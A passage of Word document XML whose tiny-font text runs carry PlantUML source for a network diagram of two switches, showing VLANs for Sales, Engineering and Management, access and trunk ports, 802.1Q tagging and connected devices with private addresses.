            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 30\nManagement" as vlan30_a #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D67DCA" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46A47796" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Access Ports" as access_a {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8CA117" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/1\nVLAN 10" as port1_a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640CC2E6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/2\nVLAN 20" as port2_a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="589DDFB3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/3\nVLAN 30" as port3_a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9BB051" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC7E88B" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36310386" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Trunk Port\nGi0/1" as trunk_a #lightblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1160FC28" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B64127" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AEE5EF7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Trunk Link" as trunk_link {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25BE15DB" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "802.1Q Tagged Frames" as tagged_frames #lightcyan {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08592A3C" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Frame 1: VLAN 10 Tag" as frame1 #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FB5F1B3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Frame 2: VLAN 20 Tag" as frame2 #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620638D1" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Frame 3: VLAN 30 Tag" as frame3 #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23BE8D22" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="603917B5" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094F6A1A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46A617C6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Switch B" as switch_b {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEAE6D6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 10\nSales" as vlan10_b #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA68CC4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 20\nEngineering" as vlan20_b #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3272F9C5" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 30\nManagement" as vlan30_b #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE4C7BD" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06CFA150" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Access Ports" as access_b {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="666C3315" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/1\nVLAN 10" as port1_b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF08F3C" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/2\nVLAN 20" as port2_b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB3CC23" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/3\nVLAN 30" as port3_b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EAB1E4D" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B643AC" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C4ECCD8" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Trunk Port\nGi0/1" as trunk_b #lightblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46152627" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34657C09" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34544541" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>rectangle "Connected Devices A" as devices_a {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FF19C3E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Sales PC\n192.168.10.10" as pc1_a #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1303B0E5" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Eng Workstation\n192.168.20.10" as pc2_a #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA607C7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Mgmt Laptop\n192.168.30.10" as pc3_a #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8514D0" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F7C6041" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41857EA5" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>rectangle "Connected Devices B" as devices_b {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39586266" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Sales PC\n192.168.10.20" as pc1_b #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC3B075" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Eng Workstation\n192.168.20.20" as pc2_b #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04554456" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Mgmt Laptop\n192.168.30.20" as pc3_b #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562B43D3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D5D26A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29F60167" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan10_a --&gt; port1_a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA09E8A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan20_a --&gt; port2_a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75EEF0F7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan30_a --&gt; port3_a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9F35F4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78E5C627" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>port1_a --&gt; pc1_a : Untagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21EFB151" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>port2_a --&gt; pc2_a : Untagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="037240AE" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>port3_a --&gt; pc3_a : Untagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5127F4EE" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04EC1E43" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan10_a --&gt; trunk_a : Add VLAN 10 Tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7151B4F9" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan20_a --&gt; trunk_a : Add VLAN 20 Tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66989CFB" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan30_a --&gt; trunk_a : Add VLAN 30 Tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07CB3203" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="194A54FD" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_a --&gt; frame1 : Tagged with VLAN 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53AB34B7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_a --&gt; frame2 : Tagged with VLAN 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A124345" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_a --&gt; frame3 : Tagged with VLAN 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AB9265" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
